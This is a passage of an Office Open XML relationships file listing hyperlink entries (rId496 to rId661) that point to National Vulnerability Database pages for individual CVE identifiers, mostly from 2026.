Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63495" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71360" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71626" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73786" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74761" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75328" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75368" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75371" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75413" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75438" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76098" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76905" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77384" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77438" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77465" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78490" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78543" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79323" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79324" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79390" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79641" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79734" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79738" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79740" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79950" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80123" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80212" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80924" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82393" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82397" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84374" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85124" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85505" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86420" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86421" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86429" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87011" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87431" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87450" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87601" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87608" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87734" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87819" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87824" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87853" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53525" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54550" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56135" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71622" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78254" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78492" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78494" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79963" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84366" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86746" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87812" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30819" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49314" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55538" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63404" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78485" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79635" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79692" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79695" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80122" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86754" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87814" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13359" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14989" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17553" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23855" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45019" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53499" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54718" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6431" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73769" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73787" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75927" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79426" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79972" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83593" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84293" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86544" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87021" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-48007" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51014" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54396" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71417" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17627" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21100" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30865" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35445" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38821" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47735" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49249" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49315" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50165" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53532" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53728" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55066" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55520" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55527" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55537" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55540" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55609" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55673" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59184" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59186" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59187" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59189" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59981" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59982" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61915" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66003" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68513" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68515" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75369" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77611" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77847" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79617" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79754" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80183" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81330" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82392" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83961" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84989" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85089" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86204" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86757" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86758" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86759" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86765" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86766" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87072" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87818" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87821" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87998" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87999" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54467" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56711" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63387" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79636" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87088" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87825" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87877" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71418" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21098" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21107" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21108" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21110" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21111" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53531" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53965" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55371" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55529" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55678" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55758" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78325" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82398" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83530" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84309" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86431" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86539" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86547" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 